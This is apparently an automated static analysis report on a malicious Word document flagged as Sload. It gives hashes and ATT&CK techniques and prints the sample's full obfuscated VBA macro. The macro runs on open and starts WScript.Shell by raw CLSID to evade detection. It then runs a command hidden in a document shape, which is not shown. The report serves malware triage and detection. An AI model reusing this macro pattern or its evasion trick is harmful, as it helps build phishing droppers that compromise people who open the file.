Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e597f631d1c73045…

MALICIOUS

Office (OLE)

Size: 147.4 KB
Created: 2018-11-28 09:45:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 2a1c615a6657761173ecd3af7870b45c
SHA-1: a965060f6cc6b1caa988c27451e6c0b0e1a4b3f2
SHA-256: e597f631d1c73045ff24a9ad51c463336ca03983d80c7cf1e719b99d067329fe
Risk Score: 252

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1218.005 System Binary Proxy Execution: Mshta
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that runs on AutoOpen, indicating a malicious document. Critical heuristics show the macro instantiating WScript.Shell, an execution-capable COM class, by its raw CLSID rather than by ProgID, and referencing PowerShell. In the decoded source the command string is assembled at run time from text stored in a document shape (Shapes("IHEZACs").TextFrame.TextRange.Text), so it does not appear in the macro text itself, and is then passed to the object's Run method. The obfuscated VBA code likely attempts to download and execute a second-stage payload, possibly via mshta.exe, as suggested by the reconstructed command.

Heuristics 9

  • ClamAV: Doc.Malware.Sload-6791731-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sload-6791731-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Next
    Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Next
    Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8742 bytes
SHA-256: da24bb15a60194cd66c5415a9e0e661d8a96b851fa45402824f8d4547a1e201d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
208 of 295 identifiers look randomly generated (e.g. 'osktKaFUXp') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vhzBiAsI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case izViuOZ
      Case 268899346
         maoSU = CBool(FvEonQo)
         XoMRQ = 334475000
      Case 245552943
         EalQcfoGw = Atn(ElwQYj)
         icAjK = Atn(119083460 * CLng(36534801))
   End Select
         For Each vwphzIqZv In OhDzZHz
         WLDEGPfJi = kKtHfWh * CDate(wYAIOMCu * zDlCsi) * vtqqrZ / Sin(naTok) / GChPsIZ + 276062484 - 94294734 + Chr(322851336) + (BLEjFzTsc * MlfrpYW)
Next
   On Error Resume Next
Select Case YoNTpTtW
      Case 104436401
         uPFEIBCIR = CBool(jjAECaEnu)
         wPFiKo = 226015111
      Case 299598317
         UoibiaKR = Atn(GWvvSZDr)
         IRPPFbAB = Atn(202386975 * CLng(67058912))
   End Select
         For Each tTSIWwJ In EVisI
         hYTBzj = TAZbXFiC * CDate(dvzurmD * YVQwmSiZ) * uYDhz / Sin(drZTtjzq) / CdsisNc + 308353349 - 140745332 + Chr(210210827) + (bQhhhvC * KKzudO)
Next
   On Error Resume Next
Select Case CjtjpObWC
      Case 341386355
         lXHNK = CBool(rwjAP)
         bNXwWjG = 85682922
      Case 205692240
         jRarkLJVl = Atn(mNjnDjJ)
         FitzmLSTR = Atn(117835737 * CLng(34744277))
   End Select
         For Each wmavqpnTV In mLPllNik
         nWPHBwjfO = RtrQvhz * CDate(nwNvqVZr * hAZEpjYS) * jfZwHK / Sin(tEmvvUE) / aqnfrjui + 64035469 - 94693720 + Chr(10399320) + (oVbNSzb * UNopC)
Next
   On Error Resume Next
Select Case tHIItZ
      Case 218004345
         bpAZta = CBool(aLiGBW)
         SKmYUdz = 66299889
      Case 80709632
         jlpHMNRl = Atn(zzNvBszwa)
         omfvR = Atn(265656441 * CLng(327590924))
   End Select
         For Each UFDPRdN In HkENzRUGX
         FOkjWhX = YzDqY * CDate(Prwjrj * khLkNsML) * RYXmjjl / Sin(iVsRFNmR) / lwGUoP + 260287876 - 336874450 + Chr(139337713) + (ZvJpKpBi * SljjGIwV)
Next
Set uYSTEzWV = Shapes("IHEZACs")
   On Error Resume Next
Select Case NjFXKkiWC
      Case 325245663
         ijjJPh = CBool(GKzSIh)
         hBXUGohOf = 82251888
      Case 24770817
         bnpLULRCi = Atn(czitKTju)
         YXjcjGBwI = Atn(219142162 * CLng(100636164))
   End Select
         For Each UFZGZ In zdGqfM
         ZZlMiOikR = RuKFFSO * CDate(VPjHs * nlChR) * isUjJjQk / Sin(TjUCaHL) / LtLrhJ + 320707644 - 103654818 + Chr(115368512) + (bYsLAScw * aiwYCii)
Next
   On Error Resume Next
Select Case QKjVz
      Case 43045712
         HBAuhFnUm = CBool(BrnpHObVV)
         jBzcIqZbq = 17823492
      Case 87185052
         CJMtiuw = Atn(VjPiCDpUJ)
         EAbLTGCYm = Atn(280736370 * CLng(209717939))
   End Select
         For Each ijmXoi In NkhWYZz
         UZEBESuz = CqpGrF * CDate(IRJFf * iOLrwKXdC) * WUhwhpbt / Sin(lZVzoWVi) / OHPsGcu + 274905225 - 275560770 + Chr(83049922) + (jajzETm * GZSpP)
Next
   On Error Resume Next
Select Case kPHwU
      Case 188777673
         HAvSTjX = CBool(vjVQMiM)
         VTcqJ = 4474450
      Case 194759069
         wAPHfwhz = Atn(KiXJkNm)
         OaCGW = Atn(79778352 * CLng(160164887))
   End Select
         For Each JmcrlNG In OUTRPzz
         WoBwowlFq = vabZbnrj * CDate(JFHqzbA * PtUoQaDki) * biMBXB / Sin(SjvosfZfb) / tOzDVoBVM + 140016978 - 331826834 + Chr(201885707) + (YotcPBJHi * rfuEF)
Next
osktKaFUXp = "" + FRBbX + GwBjXQsz + lHjBa + kkPVINC + uYSTEzWV.TextFrame.TextRange.Text + DMPZwV + MjvpDN + NTtvCL
   On Error Resume Next
Select Case WlGaJQQU
      Case 14565301
         pQzVwIHI = CBool(vWZwkfnW)
         HwpjDbVw = 137995964
      Case 212908756
         SbaMIIzwi = Atn(jrvwMNw)
         VuWudNFw = Atn(60217634 * CLng(81824038))
   End Select
         For Each ACnbMPU In NnciqsObF
         jrOYHzlZY = NGJwkbiWt * CDate(ihsQjA * LjBPlAEZV) * bvopn / Sin(WiGidwPOr) / pLCwzpGF + 169325134 - 295893508 + Chr(146527766) + (bFFZPUCb * ZvqWi)
Next
   On Error Resume Next
Select Case cczLfVbJ
      Case 176276797
         cJutZFsES = CBool(fiGMAqjv)
         GGQrvnk = 247390719
      Case 201777419
         GGAzwktz = Atn(qhdFhj)
         tVlKo = Atn(251584830 * CLng(211695749))
   End Select
         For Each TpMSzGpT In XMfilH
         HsRFvcB = IstOATrT * CDate(TdJXbwL * NQhVD) * INJDvUa / Sin(rodJGNaT) / fsEKIwEfu + 43565885 - 27666506 + Chr(222339585) + (TNEVlB * QvzzimUtR)
Next
   On Error Resume Next
Select Case fHzdMGW
      Case 8242733
         tRjuli = CBool(tKwFtPoC)
         AdrmqkpH = 181229746
      Case 321342769
         ihAzmc = Atn(zABJXFC)
         iwjkPTwzM = Atn(189022450 * CLng(202135788))
   End Select
         For Each aIccTo In FLJBTQ
         qCiqGlkwC = arhuikoUH * CDate(wpYYqi * zhYuNTXd) * SVWtidFiC / Sin(HWXaUhL) / vBdGA + 152156923 - 316802110 + Chr(257970484) + (iwMYJR * STzOjSjp)
Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
   On Error Resume Next
Select Case CElfaY
      Case 62706517
         CaRPXKYG = CBool(Jhjtd)
         tzOwHF = 21487974
      Case 92277803
         wcvztY = Atn(bztaJnE)
         vctXm = Atn(226330532 * CLng(228305583))
   End Select
         For Each YqriMa In dzMDQ
         OaNhnGjzD = GsICf * CDate(fbfPIW * BqKAz) * bwjnLj / Sin(fqzbB) / UmkqDX + 149034467 - 117146679 + Chr(129961640) + (XAmrTLrc * ikcHX)
Next
Const ipSCmF = 0
   On Error Resume Next
Select Case LZzww
      Case 169309393
         kimjfz = CBool(DGHzDZqt)
         DaACsStw = 238053714
      Case 209070610
         jWGApIcPp = Atn(JhbTG)
         dtiBRSut = Atn(146135219 * CLng(311932530))
   End Select
         For Each bRpqzAA In jAGHv
         aDYutZimj = CFihOc * CDate(iulBwz * KhaLZj) * liEqOVz / Sin(Vopiant) / TtEncNK + 309255484 - 187528254 + Chr(26041690) + (kLwWM * sRWZqAGNB)
Next
   On Error Resume Next
Select Case BfjhsItP
      Case 201060592
         YVUjLbB = CBool(muQfMlij)
         YjADFbp = 257050929
      Case 220102396
         ilUZkNfSi = Atn(JmoaJFE)
         WTwDIi = Atn(139072756 * CLng(234497440))
   End Select
         For Each VStfwdc In uSUjRhS
         GTlrauAXV = OAbcpE * CDate(jJzpw * ILDOnj) * ElfICLjr / Sin(bSVJf) / bvRcPf + 229547790 - 161075755 + Chr(125047724) + (HFdfW * NoiLcVTa)
Next
   On Error Resume Next
Select Case rVcHmVwLR
      Case 165092232
         uLpEivEJ = CBool(EOAbhMcA)
         AZzjaHBtL = 327189517
      Case 150085079
         CThUzZpG = Atn(rufKqcVA)
         ZtwTRzh = Atn(72769006 * CLng(249244612))
   End Select
         For Each CpjGnFBu In HimmuG
         iTYki = slXdmjCh * CDate(onHDwIos * oiCtr) * GBMJUNmB / Sin(WwwiJ) / SslTuz + 205039892 - 278859205 + Chr(66489144) + (qaTvw * zukXlWt)
Next
   On Error Resume Next
Select Case DjpozQb
      Case 135559299
         fzTwZPK = CBool(wWhWW)
         abzATJwAG = 123948729
      Case 250959929
         uPbwvsO = Atn(hzpwfJ)
         ZIsnw = Atn(219392154 * CLng(276894936))
   End Select
         For Each NzQHLi In rAKwUud
         apIBJ = lDVKEXr * CDate(fntEzN * fkDqBGpmj) * JvFSzqfj / Sin(buuzGGnd) / WFQuPEv + 32917837 - 31400386 + Chr(75411343) + (XwQoW * cmuhzNXNm)
Next
   On Error Resume Next
Select Case RfXPw
      Case 331273846
         clNNGdiE = CBool(ZkSWaP)
         iVQRMCM = 5533935
      Case 206096767
         wLMaiaF = Atn(JAGJd)
         kiqvqW = Atn(302174151 * CLng(227870935))
   End Select
         For Each Dotjj In ZZMijjT
         luKNQROVZ = wjiMQKIcO * CDate(JlktY * jbtbtlRm) * BjJcQ / Sin(hPBizpNI) / ZHSKi + 2620546 - 67353657 + Chr(109089789) + (kimbzwNP * IPiwzzVbV)
Next
OXVvXFKL.Run# osktKaFUXp, ipSCmF
   On Error Resume Next
Select Case jXVizq
      Case 283743391
         YUUXWNT = CBool(hipktz)
         LQofBYn = 283266474
      Case 299920648
         lNObiG = Atn(bdoGA)
         lFwHs = Atn(165923603 * CLng(142252333))
   End Select
         For Each VjwKNLL In BldbLkzF
         zbjJPLTL = CaFQu * CDate(XhQdPQ * vzlbDdZ) * AFqXtzpUF / Sin(fwDIljk) / LDdUWpSij + 232538690 - 156906645 + Chr(261687065) + (plOBU * tBUiNK)
Next
   On Error Resume Next
Select Case MtwwGaiM
      Case 243799386
         Ntjrk = CBool(hBBMbdsj)
         Ddscij = 105893297
      Case 74548497
         MztjXZjEX = Atn(fBvIcSz)
         jLMjBSdDw = Atn(248919421 * CLng(236078397))
   End Select
         For Each Zzhhf In mzicfWFX
         SIVQK = ljzmcvb * CDate(TduVQ * hUNcpjBQG) * qdiQKvaV / Sin(bnQhuDr) / rKzlBo + 178358327 - 132519088 + Chr(334010902) + (tbdcVaUwz * KvYCYv)
Next
End Sub